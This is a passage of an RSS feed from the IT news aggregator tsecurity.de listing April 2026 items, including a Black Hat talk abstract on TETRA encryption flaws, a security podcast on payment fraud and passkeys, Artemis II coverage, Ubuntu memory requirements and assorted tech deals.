<description><![CDATA[Honor X5d series has been launched by the Chinese smartphone maker in Malaysia. The lineup includes two models, dubbed Honor X5d and Honor X5d Plus. The smartphones are identical in terms of design, dimensions, and colour options. Both smartphones are currently on sale in the country via the Hono...]]></description>
<link>https://tsecurity.de/de/3419383/it-nachrichten/honor-x5d-plus-and-honor-x5d-launched-with-5260mah-battery-mediatek-helio-g81-chip-price-specifications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3419383/it-nachrichten/honor-x5d-plus-and-honor-x5d-launched-with-5260mah-battery-mediatek-helio-g81-chip-price-specifications/</guid>
<pubDate>Thu, 09 Apr 2026 08:31:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Honor X5d series has been launched by the Chinese smartphone maker in Malaysia. The lineup includes two models, dubbed Honor X5d and Honor X5d Plus. The smartphones are identical in terms of design, dimensions, and colour options. Both smartphones are currently on sale in the country via the Honor Malaysia online store. The handsets are offered in Midnight Black and T...]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat USA 2025 | 2 Cops 2 Broadcasting: TETRA End-To-End Under Scrutiny]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 18x - Views:346 In this talk, we will present the first public security analysis of TETRA end-to-end encryption (E2EE) used for the most sensitive communications - such as those by intelligence agencies and special forces.

In all-new material, we present seven secu...]]></description>
<link>https://tsecurity.de/de/3415795/it-security-video/black-hat-usa-2025-2-cops-2-broadcasting-tetra-end-to-end-under-scrutiny/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3415795/it-security-video/black-hat-usa-2025-2-cops-2-broadcasting-tetra-end-to-end-under-scrutiny/</guid>
<pubDate>Wed, 08 Apr 2026 03:17:38 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 18x - Views:346 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/oUhb2tTgmgg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In this talk, we will present the first public security analysis of TETRA end-to-end encryption (E2EE) used for the most sensitive communications - such as those by intelligence agencies and special forces.<br />
<br />
In all-new material, we present seven security vulnerabilities pertaining to TETRA and its E2EE, three of which are critical.<br />
<br />
TETRA is a European standard for trunked radio used globally by police and military operators. Additionally, TETRA is widely deployed in industrial environments such as harbors and airports, as well as critical infrastructure such as SCADA telecontrol of pipelines, transportation and electric and water utilities.<br />
<br />
While we previously reverse-engineered and published the then-secret algorithms underpinning TETRA cryptography, the vendor-proprietary E2EE solution (which enjoys significant end-user trust) intended for the most critical use cases remained undisclosed and proved quite hard to obtain.<br />
<br />
Given the opaque nature of this solution and TETRA's history of offering significantly less security than advertised (including backdoored ciphers), we decided to undertake the effort of reverse-engineering a TETRA E2EE solution.<br />
<br />
We did this by extracting it from a popular Sepura radio and discovering several critical 0-day vulnerabilities in the radio in the process, presenting additional key extraction and covert implanting vulnerabilities.<br />
<br />
We will publish the E2EE design along with a security analysis, identifying several severe shortcomings ranging from the ability to inject voice traffic into E2EE channels and replay SDS messages to an intentionally weakened E2EE variant, which reduces its 128-bit key to only 56 bits.<br />
<br />
In addition, we will discuss new findings related to multi-algorithm networks and official patches, relevant for asset owners mitigating the TETRA:BURST vulnerabilities previously uncovered by us.<br />
<br />
Finally, we will demonstrate the E2EE voice injection attack as well as the previously theoretical TETRA packet injection attack on SCADA networks.<br />
<br />
By:<br />
Carlo Meijer  |  MSc, Midnight Blue<br />
Wouter Bokslag  |  MSc, Midnight Blue<br />
Jos Wetzels  |  MSc, Midnight Blue<br />
<br />
Full Session Details Available at:<br />
https://blackhat.com/us-25/briefings/schedule/?#2-cops-2-broadcasting-tetra-end-to-end-under-scrutiny-46143<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Battling payment fraud with tokenization and executive interviews from RSAC 2026 - Jimmy White, Thyaga Vasudevan, Brian Oh, Mickey Bresman, Ashish Jain - ESW #453]]></title>
<description><![CDATA[Interview with Brian Oh from FIS Global Merchant-Specific Tokenization: Making Embedded Finance More Fraud-Resistant Payment fraud has not gone away. It has evolved into a largely social engineering-driven problem that increasingly lands on security leaders' desks. In this episode, Brian Oh from ...]]></description>
<link>https://tsecurity.de/de/3410711/it-security-nachrichten/battling-payment-fraud-with-tokenization-and-executive-interviews-from-rsac-2026-jimmy-white-thyaga-vasudevan-brian-oh-mickey-bresman-ashish-jain-esw-453/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3410711/it-security-nachrichten/battling-payment-fraud-with-tokenization-and-executive-interviews-from-rsac-2026-jimmy-white-thyaga-vasudevan-brian-oh-mickey-bresman-ashish-jain-esw-453/</guid>
<pubDate>Mon, 06 Apr 2026 11:21:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Interview with Brian Oh from FIS Global</h3> <p><strong>Merchant-Specific Tokenization: Making Embedded Finance More Fraud-Resistant</strong></p> <p>Payment fraud has not gone away. It has evolved into a largely social engineering-driven problem that increasingly lands on security leaders' desks. In this episode, Brian Oh from FIS Global explains how merchant-specific tokenization and virtual cards work, why embedded finance raises the stakes, and how approaches like behavioral biometrics and tokenized payments can reduce fraud while keeping checkout experiences fast and seamless.</p> <p>Segment Resources:</p> <ul> <li>FIS Global - <a rel="noopener" target="_blank" href="https://www.fisglobal.com/insights/the-future-of-embedded-finance"> The Future of Embedded Finance</a></li> <li>PYMNTS Article - <a rel="noopener" target="_blank" href="https://www.pymnts.com/news/regulation/2025/fdic-support-clears-path-tokenized-deposits-scale/"> FDIC Support Clears a Path for Tokenized Deposits to Scale</a></li> <li>FIS Global Blog - <a rel="noopener" target="_blank" href="https://www.fisglobal.com/blog?p=how-behavioral-biometrics-are-leading-the-way-in-secure-banking-and-fraud-defense-for-digital-one-flex-clients&amp;ap=digital-one&amp;c=digital-one"> How behavioral biometrics are leading the way in secure banking and fraud defense for Digital One™ Flex clients</a></li> <li>FIS Global Blog - <a rel="noopener" target="_blank" href="https://www.fisglobal.com/blog?p=inside-flexs-advanced-fraud-defense-what-tech-leaders-need-to-know&amp;ap=digital-one&amp;c=digital-one"> Inside Flex's Advanced Fraud Defense: What Tech Leaders Need to Know</a></li> </ul> <h3>Interviews with Mickey Bresman from Semperis and Ashish Jain from OneSpan</h3> <p><strong>The Making of Midnight in the War Room</strong></p> <p>Semperis is producing <a rel="noopener" target="_blank" href="https://www.semperis.com/midnight-in-the-war-room/">Midnight in the War Room</a>, a full length feature film on cyberwar and CISO heroism and their work defending their companies against the onslaught of cyberattacks. Midnight in the War Room puts a human face on the front lines of cyber defense and will reveal the weight carried by defenders every day and why resilience must be built not only into systems, but into people and institutions.</p> <p>This segment is sponsored by Semperis! Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/semperisrsac">https://securityweekly.com/semperisrsac</a> to learn more.</p> <p><strong>Why Passkeys Are Ready for Prime Time in Modern Banking</strong></p> <p>Authentication has long required an uneasy tradeoff between strong security and smooth user experience. This interview segment explores why passkeys are ready now for even the highest risk banking use cases, why banks should be moving quickly to adopt them, and how OneSpan delivers the most complete, secure, and enterprise ready passkey solution on the market.</p> <p>This segment is sponsored by OneSpan. Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/onespanrsac">https://securityweekly.com/onespanrsac</a> to learn more about them!</p> <h3>Interviews with Jimmy White from F5 and Thyaga Vasudevan from SkyHigh Security</h3> <p><strong>Securing AI Agents: Managing Runtime Risk in Enterprise AI Systems</strong></p> <p>As organizations deploy AI agents and automated workflows, security challenges are increasingly emerging once these systems interact with APIs, enterprise data, and business processes in production.</p> <p>For more information about F5, please visit <a rel="noopener" target="_blank" href="https://securityweekly.com/f5rsac">https://securityweekly.com/f5rsac</a>.</p> <p><strong>AI's Security Inflection Point: Hybrid, Browser Security, and Data Compliance</strong></p> <p>The rapid adoption of AI applications is reshaping enterprise security architectures. As organizations integrate AI copilots, agentic workflows, and cloud-native platforms, traditional network-centric security models are proving insufficient.</p> <p>This segment is sponsored by Skyhigh Security. Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/skyhighrsac">https://securityweekly.com/skyhighrsac</a> to learn more about them!</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/esw">https://www.securityweekly.com/esw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/esw-453">https://securityweekly.com/esw-453</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Battling payment fraud with tokenization and executive interviews from RSAC 2026 - ESW #453]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 Interview with Brian Oh from FIS Global

Merchant-Specific Tokenization: Making Embedded Finance More Fraud-Resistant

Payment fraud has not gone away. It has evolved into a largely social engineering-driven problem that incre...]]></description>
<link>https://tsecurity.de/de/3410707/it-security-video/battling-payment-fraud-with-tokenization-and-executive-interviews-from-rsac-2026-esw-453/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3410707/it-security-video/battling-payment-fraud-with-tokenization-and-executive-interviews-from-rsac-2026-esw-453/</guid>
<pubDate>Mon, 06 Apr 2026 11:17:34 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/zxV7Wdjx2vI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Interview with Brian Oh from FIS Global<br />
<br />
Merchant-Specific Tokenization: Making Embedded Finance More Fraud-Resistant<br />
<br />
Payment fraud has not gone away. It has evolved into a largely social engineering-driven problem that increasingly lands on security leaders’ desks. In this episode, Brian Oh from FIS Global explains how merchant-specific tokenization and virtual cards work, why embedded finance raises the stakes, and how approaches like behavioral biometrics and tokenized payments can reduce fraud while keeping checkout experiences fast and seamless.<br />
<br />
Segment Resources:<br />
<br />
- FIS Global - The Future of Embedded Finance: https://www.fisglobal.com/insights/the-future-of-embedded-finance<br />
- PYMNTS Article - FDIC Support Clears a Path for Tokenized Deposits to Scale: https://www.pymnts.com/news/regulation/2025/fdic-support-clears-path-tokenized-deposits-scale/<br />
- FIS Global Blog - How behavioral biometrics are leading the way in secure banking and fraud defense for Digital One™ Flex clients: https://www.fisglobal.com/blog?p=how-behavioral-biometrics-are-leading-the-way-in-secure-banking-and-fraud-defense-for-digital-one-flex-clients&ap=digital-one&c=digital-one<br />
- FIS Global Blog - Inside Flex's Advanced Fraud Defense: What Tech Leaders Need to Know: https://www.fisglobal.com/blog?p=inside-flexs-advanced-fraud-defense-what-tech-leaders-need-to-know&ap=digital-one&c=digital-one<br />
<br />
Interviews with Mickey Bresman from Semperis and Ashish Jain from OneSpan<br />
<br />
The Making of Midnight in the War Room<br />
<br />
Semperis is producing Midnight in the War Room (https://www.semperis.com/midnight-in-the-war-room/), a full length feature film on cyberwar and CISO heroism and their work defending their companies against the onslaught of cyberattacks. Midnight in the War Room puts a human face on the front lines of cyber defense and will reveal the weight carried by defenders every day and why resilience must be built not only into systems, but into people and institutions.<br />
<br />
This segment is sponsored by Semperis! Visit https://securityweekly.com/semperisrsac to learn more.<br />
<br />
Why Passkeys Are Ready for Prime Time in Modern Banking<br />
<br />
Authentication has long required an uneasy tradeoff between strong security and smooth user experience. This interview segment explores why passkeys are ready now for even the highest risk banking use cases, why banks should be moving quickly to adopt them, and how OneSpan delivers the most complete, secure, and enterprise ready passkey solution on the market.<br />
<br />
This segment is sponsored by OneSpan. Visit https://securityweekly.com/onespanrsac to learn more about them!<br />
<br />
Interviews with Jimmy White from F5 and Thyaga Vasudevan from SkyHigh Security<br />
<br />
Securing AI Agents: Managing Runtime Risk in Enterprise AI Systems<br />
<br />
As organizations deploy AI agents and automated workflows, security challenges are increasingly emerging once these systems interact with APIs, enterprise data, and business processes in production.<br />
<br />
For more information about F5, please visit https://securityweekly.com/f5rsac.<br />
<br />
AI’s Security Inflection Point: Hybrid, Browser Security, and Data Compliance<br />
<br />
The rapid adoption of AI applications is reshaping enterprise security architectures. As organizations integrate AI copilots, agentic workflows, and cloud-native platforms, traditional network-centric security models are proving insufficient.<br />
<br />
This segment is sponsored by Skyhigh Security. Visit https://securityweekly.com/skyhighrsac to learn more about them!<br />
<br />
Visit https://www.securityweekly.com/esw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/esw-453<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Artemis II arrives in lunar space ahead of its trip around the Moon]]></title>
<description><![CDATA[Artemis II and its four-man crew have entered the Moon’s “sphere of influence,” meaning the spacecraft is more affected by lunar gravity than the Earth’s pull. The transition occurred at a distance of 39,000 miles from the Moon, four days, six hours and two minutes into the mission. The next and ...]]></description>
<link>https://tsecurity.de/de/3410360/it-nachrichten/artemis-ii-arrives-in-lunar-space-ahead-of-its-trip-around-the-moon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3410360/it-nachrichten/artemis-ii-arrives-in-lunar-space-ahead-of-its-trip-around-the-moon/</guid>
<pubDate>Mon, 06 Apr 2026 08:01:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Artemis II and its four-man crew have entered the Moon’s “sphere of influence,” meaning the spacecraft is more affected by lunar gravity than the Earth’s pull. The transition occurred at a distance of 39,000 miles from the Moon, four days, six hours and two minutes into the mission. The next and most important phase will happen <a target="_blank" class="link" href="https://www.engadget.com/science/space/the-latest-on-the-artemis-ii-mission-to-the-moon-and-more-science-stories-160000539.html" data-i13n="cpos:1;pos:1">tomorrow</a> when the craft loops around the Moon’s far side, taking humans deeper into space than they’ve ever been before. </p><p>At their apogee, Astronauts Reid Wiseman, Christina Koch, Victor Glover and Canada’s Jeremy Hansen will be 252,757 miles from Earth. That will break the previous record held by the Apollo 13 crew by just over 4,000 miles. They’re the first humans to cross the lunar threshold since 1972’s Apollo 17 moon landing mission. </p><p>The crew spent this weekend carrying out preparations for their lunar flyby. That included manual piloting demonstrations, reviewing their science objectives for the six-hour observation period and evaluating their space suits, which are there for life support in the event of an emergency and for their return home. But, they've had plenty of time to take in the views, too — and those views sure are spectacular. In the latest series of images shared by the space agency, the astronauts are seen gazing at <a target="_blank" class="link" href="https://www.engadget.com/science/space/the-artemis-ii-crew-snapped-some-mesmerizing-photos-of-earth-183610493.html" data-i13n="slk:Earth through the windows of the Orion spacecraft;cpos:2;pos:1">Earth through the windows of the Orion spacecraft</a>. </p><p> Orion will reach the moon's vicinity shortly after midnight on Monday, April 6. Later that day, the crew is expected to reach a point farther than any humans have traveled from Earth, surpassing the record of 248,655 miles from Earth set by the Apollo 13 astronauts in 1970. </p><figure><img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/orionkoch_3732.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/orionkoch_3732.jpg" alt="NASA astronaut and Artemis II mission specialist Christina Koch peers out of one of the Orion spacecraft's main cabin windows, looking back at Earth, as the crew travels towards the Moon." data-uuid="80017bfa-eab7-4d48-aaf4-351e52897440"><figcaption>Mission specialist Christina Koch takes in the view.</figcaption><div class="photo-credit">NASA</div></figure><p>The lunar observation period will start at 2:45PM ET, and a few hours later, they'll be behind the moon and briefly drop out of communication. The spacecraft's closest approach to the moon is expected to occur at 7:02PM, when it will be 4,066 miles from the surface. "From that distance, the crew will see the entire disk of the Moon at once, including regions near the north and south poles," according to <a target="_blank" class="link" href="https://www.nasa.gov/blogs/missions/2026/04/04/artemis-ii-flight-day-4-deep-space-flying-lunar-flyby-prep/" data-i13n="cpos:3;pos:1">NASA</a>. The crew will later get a chance to see a solar eclipse "as Orion, the Moon, and the Sun align in such a way that the astronauts will see our star disappear behind the Moon for about an hour." NASA will have coverage of the flyby starting at 1PM ET.</p><p><strong>Update April 7 at 1:40 AM ET</strong>: The post has been updated with news that Artemis II has entered the Moon’s sphere of influence. </p>This article originally appeared on Engadget at https://www.engadget.com/science/space/artemis-ii-arrives-in-lunar-space-ahead-of-its-trip-around-the-moon-211919381.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[NASA shares breathtaking images of Artemis II astronauts taking in the view from Orion's windows]]></title>
<description><![CDATA[The Artemis II crew is almost at the moon, and the astronauts spent this weekend carrying out preparations for their lunar flyby on Monday. That included manual piloting demonstrations, reviewing their science objectives for the six-hour observation period and evaluating their space suits, which ...]]></description>
<link>https://tsecurity.de/de/3409844/it-nachrichten/nasa-shares-breathtaking-images-of-artemis-ii-astronauts-taking-in-the-view-from-orions-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3409844/it-nachrichten/nasa-shares-breathtaking-images-of-artemis-ii-astronauts-taking-in-the-view-from-orions-windows/</guid>
<pubDate>Sun, 05 Apr 2026 23:31:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Artemis II crew is <a target="_blank" class="link" href="https://www.engadget.com/science/space/the-latest-on-the-artemis-ii-mission-to-the-moon-and-more-science-stories-160000539.html" data-i13n="cpos:1;pos:1">almost at the moon</a>, and the astronauts spent this weekend carrying out preparations for their lunar flyby on Monday. That included manual piloting demonstrations, reviewing their science objectives for the six-hour observation period and evaluating their space suits, which are there for life support in the event of an emergency and for their return home. But, they've had plenty of time to take in the views, too — and those views sure are spectacular. In the latest series of images shared by the space agency, the astronauts are seen gazing at <a target="_blank" class="link" href="https://www.engadget.com/science/space/the-artemis-ii-crew-snapped-some-mesmerizing-photos-of-earth-183610493.html" data-i13n="cpos:2;pos:1">Earth through the windows of the Orion spacecraft</a>. </p><p> Orion will reach the moon's vicinity shortly after midnight on Monday, April 6. Later that day, the crew is expected to reach a point farther than any humans have traveled from Earth, surpassing the record of 248,655 miles from Earth set by the Apollo 13 astronauts in 1970. </p><figure><img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/orionkoch_3732.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/orionkoch_3732.jpg" alt="NASA astronaut and Artemis II mission specialist Christina Koch peers out of one of the Orion spacecraft's main cabin windows, looking back at Earth, as the crew travels towards the Moon." data-uuid="80017bfa-eab7-4d48-aaf4-351e52897440"><figcaption>Mission specialist Christina Koch takes in the view.</figcaption><div class="photo-credit">NASA</div></figure><p>The lunar observation period will start at 2:45PM ET, and a few hours later, they'll be behind the moon and briefly drop out of communication. The spacecraft's closest approach to the moon is expected to occur at 7:02PM, when it will be 4,066 miles from the surface. "From that distance, the crew will see the entire disk of the Moon at once, including regions near the north and south poles," according to <a target="_blank" class="link" href="https://www.nasa.gov/blogs/missions/2026/04/04/artemis-ii-flight-day-4-deep-space-flying-lunar-flyby-prep/" data-i13n="cpos:3;pos:1">NASA</a>. The crew will later get a chance to see a solar eclipse "as Orion, the Moon, and the Sun align in such a way that the astronauts will see our star disappear behind the Moon for about an hour." NASA will have coverage of the flyby starting at 1PM ET.</p>This article originally appeared on Engadget at https://www.engadget.com/science/space/nasa-shares-breathtaking-images-of-artemis-ii-astronauts-taking-in-the-view-from-orions-windows-211919760.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Does Ubuntu Now Require More RAM Than Windows 11?]]></title>
<description><![CDATA["Canonical is no longer pretending that 4GB is enough," writes the blog How-to-Geek, noting Ubuntu 26.04 LTS "raises the baseline memory to 6GB, alongside a 2GHz dual-core processor, and 25GB of storage..."

Ubuntu 14.04 LTS (Trusty Tahr) set the floor at 1GB — a modest ask when it launched more ...]]></description>
<link>https://tsecurity.de/de/3409117/linux-tipps/does-ubuntu-now-require-more-ram-than-windows-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3409117/linux-tipps/does-ubuntu-now-require-more-ram-than-windows-11/</guid>
<pubDate>Sun, 05 Apr 2026 13:40:05 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Canonical is no longer pretending that 4GB is enough," writes the blog How-to-Geek, noting Ubuntu 26.04 LTS "raises the baseline memory to 6GB, alongside a 2GHz dual-core processor, and 25GB of storage..."

Ubuntu 14.04 LTS (Trusty Tahr) set the floor at 1GB — a modest ask when it launched more than a decade ago in 2014. Then came the Ubuntu 18.04 LTS (Bionic Beaver) that pushed the number to 4GB, surviving quite well in the era of 16GB being considered standard for mid-range laptops.... Ubuntu's new minimum requirement lands in an interesting spot when compared against Windows 11. Microsoft's operating system requires just 4GB RAM, although real-world usage often tells a different story. Usually, 8GB is considered the sweet spot to handle modern apps and multitasking. 

The blog OMG Ubuntu argues this change is "not because Ubuntu requires 2GB more memory than it did, but more the way we compute does."
it's more of an honesty bump. Components that make up the distro — the GNOME desktop and extensions, modern web browsers (and the sites we load in them) and the kinds of apps we use (and keep running) whilst multitasking are more demanding... The Resolute Raccoon's memory requirements better reflect real-world multitasking. 

Ubuntu 26.04 LTS can be installed on devices with less than 6GB RAM (but not less than 25GB of disk space). The experience may not be as smooth or as responsive as developers intend (so you don't get to complain), but it will work. I installed Ubuntu 26.04 Beta on a laptop with just 2 GB of memory — slow to the point of frustration in use, but otherwise functional. 
If you have a device with 4 GB RAM and you can't upgrade (soldered memory is a thing, and e-waste can be avoided), then alternatives exist. Many Ubuntu flavours, like Lubuntu, have lower system requirements than the main edition. Plus, there's always the manual option using the Ubuntu netboot installer to install a base system and then built out a more minimal system from there.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Does+Ubuntu+Now+Require+More+RAM+Than+Windows+11%3F%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F04%2F04%2F2158228%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F04%2F04%2F2158228%2Fdoes-ubuntu-now-require-more-ram-than-windows-11%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/04/04/2158228/does-ubuntu-now-require-more-ram-than-windows-11?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Blocking children from social media is a badly executed good idea]]></title>
<description><![CDATA[Governments are each inventing their own flavor of an age based ban for social media. Is the cure worse than the disease? This article has been indexed from Malwarebytes Read the original article: Blocking children from social media is a…
Read more →
The post Blocking children from social media i...]]></description>
<link>https://tsecurity.de/de/3405760/it-security-nachrichten/blocking-children-from-social-media-is-a-badly-executed-good-idea/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3405760/it-security-nachrichten/blocking-children-from-social-media-is-a-badly-executed-good-idea/</guid>
<pubDate>Fri, 03 Apr 2026 17:22:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Governments are each inventing their own flavor of an age based ban for social media. Is the cure worse than the disease? This article has been indexed from Malwarebytes Read the original article: Blocking children from social media is a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/blocking-children-from-social-media-is-a-badly-executed-good-idea/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/blocking-children-from-social-media-is-a-badly-executed-good-idea/">Blocking children from social media is a badly executed good idea</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Blocking children from social media is a badly executed good idea]]></title>
<description><![CDATA[Governments are each inventing their own flavor of an age based ban for social media. Is the cure worse than the disease?]]></description>
<link>https://tsecurity.de/de/3405737/it-security-nachrichten/blocking-children-from-social-media-is-a-badly-executed-good-idea/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3405737/it-security-nachrichten/blocking-children-from-social-media-is-a-badly-executed-good-idea/</guid>
<pubDate>Fri, 03 Apr 2026 17:04:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Governments are each inventing their own flavor of an age based ban for social media. Is the cure worse than the disease?]]></content:encoded>
</item>
<item>
<title><![CDATA[Look Outside's April 1 update that let you kiss enemies is now a permanent 'smooch mode']]></title>
<description><![CDATA[For April Fools' Day, the developer of Look Outside released an update that added a new option to your interactions with NPCs: kissing. Instead of just fighting or talking to enemies and surviving neighbors in the cursed apartment building, you could give 'em a smooch. Their dialogue and sprites ...]]></description>
<link>https://tsecurity.de/de/3404132/it-nachrichten/look-outsides-april-1-update-that-let-you-kiss-enemies-is-now-a-permanent-smooch-mode/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3404132/it-nachrichten/look-outsides-april-1-update-that-let-you-kiss-enemies-is-now-a-permanent-smooch-mode/</guid>
<pubDate>Fri, 03 Apr 2026 00:46:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>For April Fools' Day, the developer of<em> </em><a target="_blank" class="link" href="https://store.steampowered.com/app/3373660/Look_Outside/" data-i13n="cpos:1;pos:1"><em>Look Outside</em></a> released an update that added a new option to your interactions with NPCs: kissing. Instead of just fighting or talking to enemies and surviving neighbors in the cursed apartment building, you could give 'em a smooch. Their dialogue and sprites were updated accordingly, too. Cue stammering eldritch horrors with bright red blushing cheeks. April Fools' Day is (thankfully) over now, but there's good news for anyone who has been enjoying the lovefest or didn't get a chance to try it. Developer Francis Coulombe has built in a way for players to access "smooch mode" going forward.   </p><div><div><div></div></div></div><p>"If you started a game on April 1st and kissed the wounded neighbor, that save file is now permanently in smooch mode!" <a target="_blank" class="link" href="https://bsky.app/profile/frankiepixel.bsky.social/post/3mijxrng4yk2c" data-i13n="cpos:2;pos:1">Coulombe</a> posted on social media. "You can also activate smooch mode on a new save file by naming Sam 'Casanova'." I immediately started a new save to confirm and, yes, doing this does indeed allow you to go on a kissing spree. While you can't smooch every single person/abomination you'll run into, you sure can kiss a lot of them.</p><p>Want to kiss the Rat King? Go wild. Pierre? Yup. That weird bug guy in the basement who eats bandages? Unfortunately yes, he's kissable too. This truly is the game that keeps on giving. We're apparently getting a real, non-silly update in the near-future as well, so<em> </em><a target="_blank" class="link" href="https://www.engadget.com/gaming/look-outside-is-an-unexpected-cosmic-horror-masterpiece-that-shook-me-to-the-core-171542211.html" data-i13n="cpos:3;pos:1"><em>Look Outside</em></a><em> </em>fans are eatin' good. Now, please excuse me while I get back to my Kiss Everyone (except Lyle) run. </p>This article originally appeared on Engadget at https://www.engadget.com/gaming/look-outsides-april-1-update-that-let-you-kiss-enemies-is-now-a-permanent-smooch-mode-223746232.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA['World of Warcraft: Midnight' Season 1 story end suggests to me that Blizzard really needs to rethink its story design processes — This could be much better, and far more satisfying with only a few tweaks.]]></title>
<description><![CDATA[SPOILERS: World of Warcraft's latest expansion is already proving controversial for re-treading some of the game's most hated lore. But is Blizzard trying to fix it, or will they end up making it worse?]]></description>
<link>https://tsecurity.de/de/3403684/windows-tipps/world-of-warcraft-midnight-season-1-story-end-suggests-to-me-that-blizzard-really-needs-to-rethink-its-story-design-processes-this-could-be-much-better-and-far-more-satisfying-with-only-a-few-tweaks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3403684/windows-tipps/world-of-warcraft-midnight-season-1-story-end-suggests-to-me-that-blizzard-really-needs-to-rethink-its-story-design-processes-this-could-be-much-better-and-far-more-satisfying-with-only-a-few-tweaks/</guid>
<pubDate>Thu, 02 Apr 2026 20:24:57 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[SPOILERS: World of Warcraft's latest expansion is already proving controversial for re-treading some of the game's most hated lore. But is Blizzard trying to fix it, or will they end up making it worse?]]></content:encoded>
</item>
<item>
<title><![CDATA[32GB of Corsair Vengeance DDR5 RAM is 33% off today only — This superb memory deal for PC gamers might sell out before midnight]]></title>
<description><![CDATA[Memory deals are more important than ever with the current RAM pricing surges, and Woot! is currently home to today's best deal. It expires tonight (if not sooner), so don't hold out too long.]]></description>
<link>https://tsecurity.de/de/3400502/windows-tipps/32gb-of-corsair-vengeance-ddr5-ram-is-33-off-today-only-this-superb-memory-deal-for-pc-gamers-might-sell-out-before-midnight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3400502/windows-tipps/32gb-of-corsair-vengeance-ddr5-ram-is-33-off-today-only-this-superb-memory-deal-for-pc-gamers-might-sell-out-before-midnight/</guid>
<pubDate>Wed, 01 Apr 2026 21:08:54 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Memory deals are more important than ever with the current RAM pricing surges, and Woot! is currently home to today's best deal. It expires tonight (if not sooner), so don't hold out too long.]]></content:encoded>
</item>
<item>
<title><![CDATA[AirPods Max 2 available now with same-day pickup at Apple Stores]]></title>
<description><![CDATA[Apple has started selling AirPods Max 2 across Apple Store locations worldwide, and customers can now pick them up the same day or receive deliveries as shipments begin rolling out, which marks the official retail availability of the company’s latest premium over-ear headphones.



Apple’s websit...]]></description>
